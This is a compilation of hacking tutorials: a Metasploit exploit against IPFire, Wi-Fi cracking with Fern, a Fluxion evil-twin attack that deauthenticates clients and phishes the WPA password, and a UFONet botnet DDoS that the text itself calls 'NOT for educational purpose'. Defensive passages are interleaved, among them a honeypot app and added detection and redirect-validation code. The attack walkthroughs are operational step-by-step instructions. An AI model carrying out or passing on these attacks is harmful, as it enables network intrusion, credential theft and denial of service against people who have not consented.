Exploitation in Linux Firewall using IPFire proxy.cgi RCE


Exploit Targets
IPFire 2.19

Requirement
Attacker: Kali Linux
Victim PC: Linux


Open a Kali terminal and type msfconsole


msf exploit (ipfire_proxy_exec)>set rhost 192.168.0.169 (IP of Remote Host)
msf exploit (ipfire_proxy_exec)>set password admin
msf exploit (ipfire_proxy_exec)>exploit

Detect Hacker in Network using Android Phone

HosTaGe is a mobile honeypot that detects attacks on wireless networks.

First of all, search for the HosTaGe honeypot on the Android Play Store.


Now click on the above shown app and install it.


Now, for testing, I will start an nmap version scan of the Android device from my system with the command:
nmap -sV 192.168.0.107
Here 192.168.0.107 is my target IP.
As you can see, various fake services are started, as shown in the nmap results.


As soon as the nmap scan starts, the Android icon turns red and an alarm goes off.
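The idea behind the alarm, as an added example (not HosTaGe's code and not part of the original article): nothing legitimate should connect to a decoy service, so one touch is a probe and several decoy ports touched in a short window is a scan. The decoy port set, the thresholds and the connection events are constructed assumptions.

```python
from collections import defaultdict

FAKE_SERVICE_PORTS = {21, 22, 23, 80, 445, 3306}  # assumed decoy ports (hypothetical)
SCAN_DISTINCT_PORTS = 3    # this many distinct decoy ports ...
SCAN_WINDOW = 5.0          # ... within this many seconds counts as a scan

def classify(events):
    """events: time-ordered (ts, src_ip, dst_port) -> {src_ip: 'probe' | 'scan'}."""
    hits = defaultdict(list)   # src_ip -> recent (ts, port) hits on decoy ports
    verdict = {}
    for ts, src, port in events:
        if port not in FAKE_SERVICE_PORTS:
            continue           # traffic to ports the honeypot does not emulate
        # Keep only hits still inside the sliding window, then add this one.
        hits[src] = [(t, p) for t, p in hits[src] if ts - t <= SCAN_WINDOW]
        hits[src].append((ts, port))
        if len({p for _, p in hits[src]}) >= SCAN_DISTINCT_PORTS:
            verdict[src] = "scan"
        else:
            verdict.setdefault(src, "probe")   # never downgrade an earlier 'scan'
    return verdict

def sample_events():
    """Constructed connection log: (seconds, source IP, destination port)."""
    return [(0.0, "192.168.0.50", 21), (0.2, "192.168.0.50", 22),
            (0.3, "192.168.0.77", 22), (0.4, "192.168.0.50", 80),
            (0.5, "192.168.0.50", 8080), (0.9, "192.168.0.50", 445)]

if __name__ == "__main__":
    for src, kind in classify(sample_events()).items():
        print(src, kind)
```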

Cracking Wifi Password using Fern WIFi Cracker

Fern is a Python-based Wi-Fi cracker tool used for security auditing purposes. The program is able to crack and recover WEP/WPA/WPS keys and also run other network-based attacks on wireless or Ethernet-based networks. The tool is available in an open source version and in a premium version. In this article we’ll be demonstrating a WPA dictionary attack using the open source version. You can check the link to download it here.

The first step is to launch the tool. If you have installed all of the requirements mentioned, you’ll be able to see the following screen.

 


Now, in the first option, the user can select the wireless interface from the drop-down menu. Here, we have selected the Wlan0 interface. As you can see, Fern has automatically put the Wlan0 interface into monitor mode.

 


Monitor Mode: By default, a NIC only captures packets that are addressed to that specific device. Monitor mode is essentially a promiscuous mode for wireless networks that allows Wi-Fi adapters to capture Wi-Fi management, data and control packets without having to associate with an access point first. Hence, a wireless adapter in monitor mode can capture raw pcap files, which can be used for auditing and/or hacking purposes.

 

Once we have chosen the interface, we’ll need to scan for access points now.

 


Here, observe that we have scanned a total of 18 access points.

 

 

Access Point: It is a device that sends out wireless signals. Essentially, the internet connection from a router runs down to an access point and allows users to access the internet using the IEEE 802.11 protocol (commonly known as Wi-Fi). In our day-to-day usage scenario, we have a Wi-Fi router set up at home which also serves as a wireless access point.

 

SSID: Service Set IDentifier is the name given to an access point for simplicity.

 

Launching the attack: Now we can click on the discovered access point, choose a dictionary file and click on launch attack with our chosen dictionary. It is that simple! As you can see, we have a matched credential and received the SSID password down below.

 

Please note that this program is only able to crack WPA/WEP/WPS keys. For tools that work on stronger encryption like WPA2, please refer to the latest article on wireless penetration testing on Hacking Articles. Thanks for reading.

Hack Wi-Fi using Social Engineering with Fluxion (Evil Twin Attack)


FLUXION is a remake of Linset by vk439 with fewer bugs and more features. It is compatible with the latest release of Kali. This new Wi-Fi hacking method could potentially allow hackers or attackers to recover the password key. In this method, the attacker creates a new Wi-Fi network with the same name as one that already exists. For this purpose, Fluxion is required to create an evil twin of the target wireless network (Wi-Fi). Let’s see how it works.
How it works
  • Scan the networks.
  • Capture a handshake (can’t be used without a valid handshake, it’s necessary to verify the password)
  • Use WEB Interface *
  • Launch a Fake AP instance to imitate the original access point
  • Spawns a MDK3 process, which deauthenticates all users connected to the target network, so they can be lured to connect to the Fake AP and enter the WPA password.
  • A fake DNS server is launched in order to capture all DNS requests and redirect them to the host running the script
  • A captive portal is launched in order to serve a page, which prompts the user to enter their WPA password
  • Each submitted password is verified by the handshake captured earlier
  • The attack will automatically terminate, as soon as a correct password is submitted.
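A defender's view of the sequence above, as an added example that is not part of the original article or of Fluxion: it flags a look-alike AP and a deauthentication burst in wireless sensor observations, and correlates the two. The frame records, the KNOWN_APS inventory and the thresholds are constructed assumptions.

```python
from collections import defaultdict, deque

# Assumed inventory of legitimate access points (hypothetical values).
KNOWN_APS = {"CORP-WIFI": {"bssids": {"aa:bb:cc:00:00:01"}, "enc": "WPA2"}}
DEAUTH_THRESHOLD = 20   # deauth frames naming one BSSID ...
WINDOW_SECONDS = 10     # ... within this sliding window

def detect(frames):
    """Return a sorted list of (kind, ssid) alerts for time-ordered frames."""
    alerts = set()
    bssid_to_ssid = {b: s for s, ap in KNOWN_APS.items() for b in ap["bssids"]}
    recent = defaultdict(deque)   # bssid -> timestamps of recent deauth frames
    for f in frames:
        if f["type"] == "beacon" and f["ssid"] in KNOWN_APS:
            ap = KNOWN_APS[f["ssid"]]
            # Same network name from an unknown radio, or with other security.
            if f["bssid"] not in ap["bssids"] or f["enc"] != ap["enc"]:
                alerts.add(("rogue_ap", f["ssid"]))
        elif f["type"] == "deauth" and f["bssid"] in bssid_to_ssid:
            q = recent[f["bssid"]]
            q.append(f["ts"])
            while q and f["ts"] - q[0] > WINDOW_SECONDS:
                q.popleft()
            if len(q) >= DEAUTH_THRESHOLD:
                alerts.add(("deauth_flood", bssid_to_ssid[f["bssid"]]))
    # A look-alike AP plus a deauth burst on the real one is the evil-twin pattern.
    for ssid in KNOWN_APS:
        if ("rogue_ap", ssid) in alerts and ("deauth_flood", ssid) in alerts:
            alerts.add(("evil_twin_suspected", ssid))
    return sorted(alerts)

def sample_frames():
    """Constructed sensor observations (not a real capture)."""
    frames = [{"ts": 0.0, "type": "beacon", "ssid": "CORP-WIFI",
               "bssid": "aa:bb:cc:00:00:01", "enc": "WPA2"},
              {"ts": 1.0, "type": "beacon", "ssid": "CORP-WIFI",
               "bssid": "de:ad:be:ef:00:02", "enc": "OPEN"}]
    frames += [{"ts": 2.0 + i * 0.1, "type": "deauth",
                "bssid": "aa:bb:cc:00:00:01"} for i in range(30)]
    return frames

if __name__ == "__main__":
    for alert in detect(sample_frames()):
        print(alert)
```

Enabling 802.11w Protected Management Frames on access points and clients makes spoofed deauthentication frames ineffective, which removes the step that pushes users toward the fake AP.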
First of all clone Fluxion from github with command:
git clone https://github.com/wi-fi-analyzer/fluxion.git


Now that you have downloaded Fluxion, download all the tools required to run it, as shown in the image below.
cd fluxion
ls
cd install/
ls
./install.sh



And execute the script from its folder with command:
./fluxion
You will see the screen shown below. Select your preferred language; we have chosen English by pressing 1 and then Enter.


Now select all channels, which is option 1. It will ask you to select the channel on which to listen for Wi-Fi connections, so enter 1 to listen on all of them.



Now a new window will appear on your screen, monitoring all the Wi-Fi channels. Once you see your target Wi-Fi, simply hit Ctrl+C to stop the search.


Now it will show you a list of available targets. Select yours by entering the ID number of that connection; in my case I have chosen PEN LAB by pressing 4. Notice a change in the list of available targets: on ID numbers 3 and 4 there is an asterisk (*) before the MAC address, which indicates that an increased number of clients are attached to this Wi-Fi connection. For this reason, we have chosen ID number 4.
The more clients there are, the more people there are who can enter the Wi-Fi password erroneously.



Now select option 1 for establishing Fake AP (access point) and press enter. It will generate a Fake wi-fi AP.



Now choose ENTER to skip and then select 1 for choosing Pyrit from handshake checking options.



Now you can simply press ENTER to save the .cap file at the default location, i.e. /root/Desktop/fluxion.cap, or you may provide a path to save the .cap file at another location.



Now select option 1 to deauthenticate all clients attached to the target Wi-Fi. Here, Deauth all means that it sends a small DoS attack, and all the clients connected to the Wi-Fi will be disconnected automatically.



Now select 1 for CAPTURE HANDSHAKE; you will see 2 windows, one for capturing the WPA handshake and the other for deauthenticating all clients. Now enter 1 in the MENU window to check the handshake without closing the other ones.


Now enter 1 to select Create a SSL certificate.


Again choose 1 for WEB INTERFACE.


Now it will ask you to choose the language, so select 1 for English and enter.




Now it will show you 4 different windows, starting the fake AP and deauthenticating the clients of the Wi-Fi network. At this point, the clients will see 2 Wi-Fi APs under the same name.



When the victim connects to the fake AP, it will ask for the password to reconnect to the network.
The moment the password is entered, you will see a screen with the password entered by the victim.



Now, as shown in the image above, we have obtained the key or password “ignite@123” through FLUXION, which is the best, trouble-free and straightforward method of cracking the Wi-Fi password.


How to Create a Botnet for a DDoS Attack with UFONet

Remember: this tool is NOT for educational purpose.

  Usage of UFONet for attacking targets without prior mutual consent is illegal.

  It is the end user's responsibility to obey all applicable local, state and federal laws

UFONet is a free software tool designed to test DDoS attacks against a target, using 'Open Redirect' vectors on third-party web applications as a botnet.
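Seen from the side of a site owner whose application could be used as one of these 'Open Redirect' vectors, an added example (not UFONet code and not part of the original article) puts the vulnerable redirect pattern beside a hardened check that only lets a local path or an allowlisted host through. The function names, ALLOWED_HOSTS and the sample values are hypothetical.

```python
from urllib.parse import urlsplit

# Hosts this application may redirect to (hypothetical allowlist).
ALLOWED_HOSTS = {"www.example.org", "static.example.org"}

def unsafe_redirect_target(url):
    """Open-redirect pattern: the client-supplied value is used unchanged."""
    return url

def safe_redirect_target(url, default="/"):
    """Return url only for a local path or an allowlisted https host."""
    # Backslashes, control characters and padding are parsed differently
    # by browsers and by urlsplit, so refuse them outright.
    if not url or url != url.strip() or any(c in url for c in "\\\r\n\t"):
        return default
    try:
        parts = urlsplit(url)
    except ValueError:                      # e.g. malformed IPv6 literal
        return default
    if not parts.scheme and not parts.netloc:
        # Relative reference: accept a single-slash absolute path only.
        return url if url.startswith("/") and not url.startswith("//") else default
    if parts.scheme != "https" or parts.username or parts.password:
        return default
    return url if (parts.hostname or "") in ALLOWED_HOSTS else default

def audit(candidates):
    """Map each candidate to True if the hardened check lets it through."""
    return {u: safe_redirect_target(u) == u for u in candidates}

# Constructed test values, not taken from any real application.
SAMPLES = ["/account", "https://www.example.org/help", "//203.0.113.5/",
           "https://203.0.113.5/big.iso", "https://www.example.org@203.0.113.5/",
           "http://www.example.org/", "/\\203.0.113.5"]

if __name__ == "__main__":
    for url, allowed in audit(SAMPLES).items():
        print(f"{allowed!s:5}  {url}")
```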

Features
  • Auto-update
  • Clean code (only needs python-pycurl)
  • Documentation with examples
  • Web/GUI Interface
  • Proxy to connect to 'zombies' (ex: tor)
  • Change HTTP Headers (User-Agent, Referer, Host...)
  • Configure requests (Timeout, Retries, Delay...)
  • Search for 'zombies' on google results (using a pattern or a list of dorks)
  • Test 'Open Redirect' vulnerabilities on 'zombies'
  • Download/Upload 'zombies' from Community
  • Inspect a target (HTML objects sizes)
  • Set a place to 'bit' on a target (ex: big file)
  • Control number of rounds to attack
  • Apply cache evasion techniques
  • Supports GET/POST
  • Multithreading
  • Different search engines for dorking
  • Web interface
  • Geomapping / Visual data
  • Order 'zombies' to attack you for benchmarking


First of all, download UFONet from SourceForge using this link:
https://sourceforge.net/projects/ufonet/
Extract it, enter the folder, open a terminal, and list all the available options with this command:

./ufonet  --help


Now we have to download all the zombies that will be used for the attack. Open the terminal and type:
./ufonet  --download-zombies


Now type the following command for using the GUI version:
./ufonet  --gui


The above command will open a browser with GUI options. Click on START MOTHERSHIP.


Now it will open up a GUI with different options.


Now click on Botnet option.


Clicking on Botnet will give many options to configure.


Now clicking on List Zombies will list all the Zombies it will be using for the attack.


Now click on Attack option.


Set the target to your target URL or your target IP and set the number of rounds as per your need and click on start for the attack.


As you can see, the first round of the attack has started from multiple zombies, and after some time the host will be down.